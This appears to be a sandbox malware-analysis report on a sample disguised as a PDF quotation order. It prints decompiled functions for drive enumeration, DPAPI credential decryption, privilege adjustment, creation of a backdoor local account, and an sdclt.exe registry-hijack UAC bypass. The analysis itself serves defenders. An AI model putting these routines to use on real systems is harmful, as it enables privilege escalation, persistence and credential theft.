0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0041EEA0
FindNextFileW.KERNEL32(000000FF,?,?), ref: 0041EF61

Strings

j`@, xrefs: 0041EF10
j`@, xrefs: 0041EE97, 0041EF83, 0041EEC3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: j`@$j`@
API String ID: 1690352074-2610743150
Opcode ID: 3fb7b2135524719962353687740f72e586f7615ff8e7f271740f338b4f7888d1
Instruction ID: 070ccb40b06900a5e431057f202022ee73547b5e5a5bc1b2974ba4332eb13929
Opcode Fuzzy Hash: 3fb7b2135524719962353687740f72e586f7615ff8e7f271740f338b4f7888d1
Instruction Fuzzy Hash: BA31297590021CABCF04EFA5DC959EDB7B8BF04304F50826AF416B31A1EB38AB85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A064 Relevance: 6.0, APIs: 4, Instructions: 47
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A064(void* __ecx, intOrPtr _a4, void** _a8, long* _a12) {
				signed int _v8;
				signed int* _t19;
				signed int _t24;

				_v8 = _v8 & 0x00000000;
				 *_a8 =  *_a8 & 0x00000000;
				_t19 = _a12;
				 *_t19 =  *_t19 & 0x00000000;
				__imp__CryptStringToBinaryW(_a4, 0, 1, 0, _a12, 0, 0, __ecx);
				if(_t19 != 0) {
					 *_a8 = LocalAlloc(0x40,  *_a12);
					if( *_a8 != 0) {
						_t24 = _a8;
						__imp__CryptStringToBinaryW(_a4, 0, 1,  *_t24, _a12, 0, 0);
						_v8 = _t24;
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x0041a068
0x0041a06f
0x0041a072
0x0041a075
0x0041a088
0x0041a090
0x0041a0a2
0x0041a0aa
0x0041a0b3
0x0041a0bf
0x0041a0c5
0x0041a0cc
0x0041a0dc
0x0041a0dc
0x0041a0cc
0x0041a0aa
0x0041a0e2

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A088
LocalAlloc.KERNEL32(00000040,00419F98,?,?,00419F98,00000000,00000000), ref: 0041A099
CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A0BF
LocalFree.KERNEL32(00000000,?,?,00419F98,00000000,00000000), ref: 0041A0D3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 8b51e8908cbcaf40fd58a6c1150f78182a9708f8c1eabccd91fc9ac4dbbebb90
Instruction ID: 609bf11126d31f19ee7c822252d02559da9e1221cac5487fba22adcd8d596e5a
Opcode Fuzzy Hash: 8b51e8908cbcaf40fd58a6c1150f78182a9708f8c1eabccd91fc9ac4dbbebb90
Instruction Fuzzy Hash: 0011B771240208FFEB21CF54CC46B997BB1FB09715F108054FA18AF2E0C7B5AA51EB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF90 Relevance: 4.6, APIs: 3, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041EF90(void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				char _v40;
				WCHAR* _v44;
				int _v52;
				char _v56;
				char _v72;
				signed int _t142;
				signed int _t144;
				void* _t146;

				_v12 = 0x104;
				_t142 = 2;
				_v24 = E0040B8D1( ~(0 | __eflags > 0x00000000) | _v12 * _t142);
				_v8 = _v24;
				E00402DA7( &_v72);
				_v16 = GetLogicalDriveStringsW(_v12, _v8);
				_t148 = _v16 - _v12;
				if(_v16 > _v12) {
					_v12 = _v16;
					_v28 = _v8;
					E0040B881(_v28);
					_t144 = 2;
					_v32 = E0040B8D1( ~(0 | _t148 > 0x00000000) | _v12 * _t144);
					_v8 = _v32;
					_v16 = GetLogicalDriveStringsW(_v12, _v8);
				}
				if(_v16 >= 0) {
					_v20 = _v8;
					while(1) {
						__eflags =  *_v20 & 0x0000ffff;
						if(( *_v20 & 0x0000ffff) == 0) {
							break;
						}
						E004022D9( &_v56);
						E00406BFC( &_v56, E00406F64( &_v40, _v20));
						E00406BE2();
						_v52 = GetDriveTypeW(E00406F44( &_v56));
						_t146 = _t146 - 0xc;
						E00402527(_t146,  &_v56);
						E00401D8F( &_v72);
						_v20 = _v20 + 2 + E00406F1B( &_v56) * 2;
						E00401698( &_v56);
					}
					__eflags = _v8;
					if(__eflags != 0) {
						_v44 = _v8;
						E0040B881(_v44);
					}
					E00401799(_a4, __eflags,  &_v72);
					E00401800( &_v72);
					return _a4;
				} else {
					_t151 = _v8;
					if(_v8 != 0) {
						_v36 = _v8;
						E0040B881(_v36);
					}
					E00401799(_a4, _t151,  &_v72);
					E00401800( &_v72);
					return _a4;
				}
			}

0x0041ef96
0x0041efa4
0x0041efb5
0x0041efbb
0x0041efc1
0x0041efd2
0x0041efd8
0x0041efdb
0x0041efe0
0x0041efe6
0x0041efec
0x0041eff9
0x0041f00a
0x0041f010
0x0041f01f
0x0041f01f
0x0041f026
0x0041f05c
0x0041f05f
0x0041f065
0x0041f067
0x00000000
0x00000000
0x0041f06c
0x0041f080
0x0041f088
0x0041f09c
0x0041f09f
0x0041f0a8
0x0041f0b0
0x0041f0c4
0x0041f0ca
0x0041f0ca
0x0041f0d1
0x0041f0d5
0x0041f0da
0x0041f0e0
0x0041f0e5
0x0041f0ed
0x0041f0f5
0x00000000
0x0041f028
0x0041f028
0x0041f02c
0x0041f031
0x0041f037
0x0041f03c
0x0041f044
0x0041f04c
0x00000000
0x0041f051

APIs

GetLogicalDriveStringsW.KERNEL32(00000104,?), ref: 0041EFCC
GetLogicalDriveStringsW.KERNEL32(00000104,?), ref: 0041F019

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

GetDriveTypeW.KERNEL32(00000000,00000000,?), ref: 0041F096

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Drivelstrlen$LogicalStringslstrcpy$Type
String ID:
API String ID: 3877626576-0
Opcode ID: acc6bde5e69126abceefa9ba3fbef67affcc76b47c72481c5880f3363fe40309
Instruction ID: ca2f7c09894e322f483616783b0e22a8fa767a6446f764eb540c3c0431632824
Opcode Fuzzy Hash: acc6bde5e69126abceefa9ba3fbef67affcc76b47c72481c5880f3363fe40309
Instruction Fuzzy Hash: EF41A871D01109AFDF04EFA5D9569EDBBB5EF08344F20407AE402B62A1DB346E86DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E04E Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041E04E(void* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				void* _t52;

				_v8 = _v8 & 0x00000000;
				_v20.LowPart = 0;
				_v20.HighPart = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _v12 & 0x00000000;
				if(OpenProcessToken(_a4, 0x28,  &_v8) != 0) {
					if(LookupPrivilegeValueW(0, E00406F44(_a8),  &_v20) != 0) {
						_v36.PrivilegeCount = 1;
						_t34 = 0xc;
						_t35 = _t34 * 0;
						 *(_t52 + _t35 - 0x1c) = _v20.LowPart;
						 *((intOrPtr*)(_t52 + _t35 - 0x18)) = _v20.HighPart;
						_t36 = 0xc;
						 *((intOrPtr*)(_t52 + _t36 * 0 - 0x14)) = 2;
						if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) != 0) {
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x0041e055
0x0041e05b
0x0041e05e
0x0041e066
0x0041e067
0x0041e068
0x0041e069
0x0041e06f
0x0041e070
0x0041e071
0x0041e072
0x0041e073
0x0041e088
0x0041e0a5
0x0041e0ab
0x0041e0b4
0x0041e0b5
0x0041e0be
0x0041e0c2
0x0041e0c8
0x0041e0cc
0x0041e0ef
0x00000000
0x0041e0f7
0x00000000
0x0041e0f1
0x00000000
0x0041e0a7
0x00000000

APIs

OpenProcessToken.ADVAPI32(00000000,00000028,00000000,?,?,?,?,?,?,?,?,?,?,0041C7EB), ref: 0041E080
LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0041E09D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: LookupOpenPrivilegeProcessTokenValue
String ID:
API String ID: 2227196851-0
Opcode ID: aee790c2d8bb20486fb325af274062c7e0e536f9a62db262fc65402f569d97fa
Instruction ID: 170346a2f29178033b665b3aac1256367176b1448f728ff72c70790de6479712
Opcode Fuzzy Hash: aee790c2d8bb20486fb325af274062c7e0e536f9a62db262fc65402f569d97fa
Instruction Fuzzy Hash: DF215175A10118BFFB50CFA8DC05BEFBBB8EB4C304F104836E902E6190E7B49A459B55

Uniqueness

Uniqueness Score: -1.00%

Function 00416647 Relevance: 4.6, APIs: 3, Instructions: 62
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00416647(intOrPtr __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				BYTE* _v40;
				signed int _v44;
				signed int _v48;
				char _v8144;
				intOrPtr _t58;

				_t58 = __ecx;
				E004012A0(0x1fcc, __ecx);
				_v28 = _t58;
				_v48 = _v48 & 0x00000000;
				_v8 = 0x1fa0;
				_v24 = lstrlenA(_a4);
				E0040132F( &_v8144, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _v24, 1,  &_v8144,  &_v8, 0, 0);
				_v40 =  &_v8144;
				_v36 = _v8;
				_v44 = _v44 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 =  *((intOrPtr*)(_v28 + 0x8c));
				_v32( &_v44,  &_v20, 0);
				 *((char*)(_v16 + _v12)) = 0;
				 *_a8 = E0040B7F4(_v12 + 1, 0x3000);
				return lstrcpyA( *_a8, _v16);
			}

0x00416647
0x0041664f
0x00416654
0x00416657
0x0041665b
0x0041666b
0x0041667c
0x0041669b
0x004166a7
0x004166ad
0x004166b0
0x004166b4
0x004166b8
0x004166bc
0x004166c9
0x004166d6
0x004166e2
0x004166f9
0x0041670a

APIs

lstrlenA.KERNEL32(00000000), ref: 00416665
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,?,00001FA0,00000000,00000000), ref: 0041669B

Part of subcall function 0040B7F4: VirtualAlloc.KERNEL32(00000000,?,?,00000004,?,00406FE8,?,00003000,?,?,00422109,?), ref: 0040B801

lstrcpyA.KERNEL32(00000000,00000000), ref: 00416703

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
String ID:
API String ID: 573875632-0
Opcode ID: 6d0fbaf10b45b9ac1bb9b3404bf5fb3cb53a251a57a7092cc849f9becdb85028
Instruction ID: b3c1d06678b3e19b54f76faa9bdc130926ced38eb78ef50d8608957db8c6bddf
Opcode Fuzzy Hash: 6d0fbaf10b45b9ac1bb9b3404bf5fb3cb53a251a57a7092cc849f9becdb85028
Instruction Fuzzy Hash: E321F875D0020EAFEB00DF94C845BEEBBB8EF04315F504066E904F6291D779AA54DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00419E88 Relevance: 4.6, APIs: 3, Instructions: 50
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00419E88(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, long* _a36) {
				signed int _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				signed int _t35;

				_v8 = _v8 & 0x00000000;
				_v32 = _a8;
				_v28 = _a4;
				_v24 = _a20;
				_v20 = _a16;
				_t35 =  &_v32;
				__imp__CryptUnprotectData(_t35, _a12,  &_v24, 0, _a24, _a28,  &_v16);
				_v8 = _t35;
				if(_v8 != 0) {
					 *_a36 = _v16;
					 *_a32 = LocalAlloc(0x40,  *_a36);
					if( *_a32 != 0) {
						E00401309( *_a32, _v12,  *_a36);
					}
					LocalFree(_v12);
				}
				return _v8;
			}

0x00419e8e
0x00419e95
0x00419e9b
0x00419ea1
0x00419ea7
0x00419ebd
0x00419ec1
0x00419ec7
0x00419ece
0x00419ed6
0x00419ee8
0x00419ef0
0x00419eff
0x00419f04
0x00419f0a
0x00419f0a
0x00419f14

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,00000000,?,00000000,00000000), ref: 00419EC1
LocalAlloc.KERNEL32(00000040,?), ref: 00419EDF
LocalFree.KERNEL32(?), ref: 00419F0A

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7c923f8ff18b2ef4ebe1e62c98cecc2e9ac596c8b5dbe2fa725ee81a337ef6b6
Instruction ID: 79d34cb9f0b5ac021611d81229b655664af828fd42414c3815559651eb949f0c
Opcode Fuzzy Hash: 7c923f8ff18b2ef4ebe1e62c98cecc2e9ac596c8b5dbe2fa725ee81a337ef6b6
Instruction Fuzzy Hash: 88117A75A00209EFCB01DFA8C945ADEBBF9FB08318F0141A5F908A7260D735AA55DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB68 Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041AB68(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				void _v56;
				void* _t32;
				intOrPtr _t37;
				signed int _t44;

				_v24 = __ecx;
				_t44 = 8;
				memset( &_v56, 0, _t44 << 2);
				_v8 = 0;
				_v56 = E00406F44(_a4);
				_v52 = E00406F44(_a8);
				_v44 = 1;
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v32 = 0x10201;
				_v28 = _v28 & 0x00000000;
				_t32 =  &_v56;
				__imp__NetUserAdd(0, 1, _t32, 0);
				_v12 = _t32;
				if(_v12 == 0) {
					_v8 = E00406F44(_a4);
					_t37 = E00406F44(E0041DF7D(_a4, __eflags,  &_v16));
					__imp__NetLocalGroupAddMembers(0, _t37, 3,  &_v8, 1);
					_v20 = _t37;
					E00406BE2();
					__eflags = _v20;
					if(_v20 == 0) {
						__eflags = 1;
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x0041ab6f
0x0041ab74
0x0041ab7a
0x0041ab7e
0x0041ab89
0x0041ab94
0x0041ab97
0x0041ab9e
0x0041aba2
0x0041aba6
0x0041abad
0x0041abb3
0x0041abbb
0x0041abc1
0x0041abc8
0x0041abd6
0x0041abed
0x0041abf5
0x0041abfb
0x0041ac01
0x0041ac06
0x0041ac0a
0x0041ac12
0x00000000
0x0041ac12
0x00000000
0x0041ac0c
0x00000000

APIs

NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?), ref: 0041ABBB
NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,?,00000001), ref: 0041ABF5

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: GroupLocalMembersUser
String ID:
API String ID: 290690625-0
Opcode ID: 44451b9994ea013b9b76f967981b23eb4e774537895a16a86c8ec88326add01f
Instruction ID: b23526cc541d65a46c065ff660a87e4a1d212f9a2cd9a2fff11ba9fa4dcbdcfa
Opcode Fuzzy Hash: 44451b9994ea013b9b76f967981b23eb4e774537895a16a86c8ec88326add01f
Instruction Fuzzy Hash: 26212EB1E15209EFDB40EFA4D945BEEB7F8EB04305F10446AE502F61C0E7B85A85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F902 Relevance: 1.3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041F902(void* __ecx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t28;
				void* _t33;

				_t33 = __ecx;
				_v12 =  *[fs:0x30];
				_v8 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc)) + 0x14));
				while(_v8 !=  *((intOrPtr*)(_v12 + 0xc)) + 0x14) {
					_v16 = _v8 - 8;
					_t12 = _v16 + 0x30; // 0x247e850
					_t28 = E0041FB23(_t33,  *_t12, L"ntdll.dll");
					_pop(_t33);
					if(_t28 != 0) {
						_v8 =  *_v8;
						continue;
					}
					_t14 = _v16 + 0x18; // 0x25fe850
					return  *_t14;
				}
				return 0;
			}

0x0041f902
0x0041f90e
0x0041f91a
0x0041f91d
0x0041f931
0x0041f93c
0x0041f93f
0x0041f945
0x0041f948
0x0041f957
0x00000000
0x0041f957
0x0041f94d
0x00000000
0x0041f94d
0x00000000

Strings

ntdll.dll, xrefs: 0041F934

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID:
String ID: ntdll.dll
API String ID: 0-2227199552
Opcode ID: 22a0ea26bd6c40b835032c4b38b797bf7b82462a05323e920327dd3204a6f85f
Instruction ID: 03c91b09678b69f6c5a87c508c4f7dd83077498137820afe9151f64ff4482b5a
Opcode Fuzzy Hash: 22a0ea26bd6c40b835032c4b38b797bf7b82462a05323e920327dd3204a6f85f
Instruction Fuzzy Hash: AE01C475A24209EFCB00EFACD591A9DBBF0EB08314F1480A6E855EB321D634EE45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042C78A Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction ID: fa340867f37808e6291b80772d47691072bcc93d54a68e82e80e18be4d772b94
Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction Fuzzy Hash: D5315D76F0062A9FCB14DF58D4C09AEB7F5BF89314B6581AAD401A7711D734E941CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8F0 Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F8F0(void* __ecx) {
				intOrPtr _v8;

				_v8 =  *[fs:0x30];
				return _v8;
			}

0x0041f8fa
0x0041f901

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction ID: b4b312fe3a0bf3500f56ba9c68af6614ef01e88f3f64379312b6b6f37a325d42
Opcode Fuzzy Hash: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction Fuzzy Hash: 61B09270A1668DEBCB01CB9DE641A49B7FCE708A88F1000A8E409E3700D274EF009A54

Uniqueness

Uniqueness Score: -1.00%

Function 00421978 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 195
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00421978(void* __ecx, void* __eflags) {
				char _v8;
				signed int _v12;
				char _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				struct _PROCESS_INFORMATION _v52;
				void* _v56;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				WCHAR* _v96;
				char* _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v140;
				void _v208;
				struct _STARTUPINFOA _v276;
				short _v340;
				short _v860;
				char _v1339;
				char _v1380;
				char _v2404;
				void* _t62;
				signed int _t125;

				_t62 = E0041E932();
				_t156 = _t62 - 1;
				if(_t62 == 1) {
					__eflags = 0;
					return 0;
				}
				E0041E9F8(__ecx, _t156,  &_v8, 5);
				E00406C53( &_v8, _t156, L"\\Documents:ApplicationData");
				E0041EA3F(_t156,  &_v16);
				_v20 = CharLowerW(E00406F44( &_v8));
				_v24 = CharLowerW(E00406F44( &_v16));
				if(lstrcmpW(_v24, _v20) != 0) {
					CloseHandle( *0x5601f4);
					_v12 = _v12 & 0x00000000;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
					__eflags = _v12;
					if(__eflags != 0) {
						E0041E2F0( &_v16, __eflags,  &_v36);
					}
					E0042170C(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					E0040132F( &_v2404, 0, 0x400);
					GetModuleFileNameA(0,  &_v2404, 0x400);
					E00421694(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", L"",  &_v2404);
					E00421694(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", "DelegateExecute", 0x4264c2);
					GetSystemDirectoryW( &_v860, 0x104);
					lstrcatW( &_v860, L"\\sdclt.exe");
					asm("movsd");
					asm("movsd");
					asm("movsb");
					_v32 = GetLastError();
					E0040132F( &_v208, 0, 0x44);
					_t125 = 0x11;
					memcpy( &_v276,  &_v208, _t125 << 2);
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0xa);
					memcpy( &_v1380, "cmd.exe /C C:\\Windows\\System32\\sdclt.exe", 0 << 2);
					asm("movsb");
					E0040132F( &_v1339, 0, 0x1df);
					Sleep(0x4e20);
					_v32 = CreateProcessA(0,  &_v1380, 0, 0, 0, 0, 0, 0,  &_v276,  &_v52);
					CloseHandle(_v52.hThread);
					CloseHandle(_v52);
					wsprintfW( &_v340, L"%d",  &_v860);
					_v112 = 0x3c;
					_v108 = 0x40;
					_v104 = _v104 & 0x00000000;
					_v100 = L"open";
					_v96 =  &_v860;
					_v92 = _v92 & 0x00000000;
					_v88 = _v88 & 0x00000000;
					_v84 = 5;
					_v80 = _v80 & 0x00000000;
					TerminateProcess(_v56, 0);
					__eflags = _v12;
					if(__eflags != 0) {
						E0041E2A7(0, __eflags,  &_v36);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				_v28 = _v28 & 0x00000000;
				E00406BE2();
				E00406BE2();
				return _v28;
			}

0x00421983
0x00421988
0x0042198b
0x00421c29
0x00000000
0x00421c29
0x00421997
0x004219a6
0x004219af
0x004219c4
0x004219d6
0x004219e7
0x00421a0b
0x00421a11
0x00421a20
0x00421a26
0x00421a2a
0x00421a30
0x00421a35
0x00421a40
0x00421a55
0x00421a6b
0x00421a87
0x00421aa3
0x00421ab7
0x00421ac9
0x00421ada
0x00421adb
0x00421adc
0x00421ae3
0x00421af1
0x00421afb
0x00421b08
0x00421b0f
0x00421b10
0x00421b11
0x00421b12
0x00421b19
0x00421b1a
0x00421b1b
0x00421b1c
0x00421b1d
0x00421b2b
0x00421b2d
0x00421b3c
0x00421b49
0x00421b75
0x00421b7b
0x00421b84
0x00421b9d
0x00421ba6
0x00421bad
0x00421bb4
0x00421bb8
0x00421bc5
0x00421bc8
0x00421bcc
0x00421bd0
0x00421bd7
0x00421be0
0x00421be6
0x00421bea
0x00421bf0
0x00421bf5
0x00421bfb
0x00421c0b
0x00421c13
0x00421c13
0x004219e9
0x004219f0
0x004219f8
0x00000000

APIs

Part of subcall function 0041E932: GetCurrentProcess.KERNEL32(00000008,00000000,00404873,?,dBB), ref: 0041E946
Part of subcall function 0041E932: OpenProcessToken.ADVAPI32(00000000,?,dBB), ref: 0041E94D
Part of subcall function 0041E932: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000004,00000004,00000004), ref: 0041E96D
Part of subcall function 0041E932: FindCloseChangeNotification.KERNEL32(00000000,?,dBB), ref: 0041E986

Part of subcall function 0041E9F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0041EA25

Part of subcall function 0041EA3F: GetModuleFileNameW.KERNEL32(00000000,?,000003E8,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,dBB), ref: 0041EA65

CharLowerW.USER32(00000000,\Documents:ApplicationData), ref: 004219BE
CharLowerW.USER32(00000000), ref: 004219D0
lstrcmpW.KERNEL32(?,?), ref: 004219DF
CloseHandle.KERNEL32 ref: 00421A0B
GetCurrentProcess.KERNEL32(00000000), ref: 00421A19
IsWow64Process.KERNEL32(00000000), ref: 00421A20
GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 00421A6B
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00421AB7
lstrcatW.KERNEL32(?,\sdclt.exe), ref: 00421AC9
GetLastError.KERNEL32 ref: 00421ADD
Sleep.KERNEL32(00004E20), ref: 00421B49

Strings

\Documents:ApplicationData, xrefs: 0042199E
<, xrefs: 00421BA6
cmd.exe /C C:\Windows\System32\sdclt.exe, xrefs: 00421B20
Software\Classes\Folder\shell\open\command, xrefs: 00421A99
test.vbs, xrefs: 00421ACF
DelegateExecute, xrefs: 00421A94
open, xrefs: 00421BB8
\sdclt.exe, xrefs: 00421ABD
Software\Classes\Folder\shell\open\command, xrefs: 00421C01
Software\Classes\Folder\shell\open\command, xrefs: 00421A36
Software\Classes\Folder\shell\open\command, xrefs: 00421A7D
@, xrefs: 00421BAD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

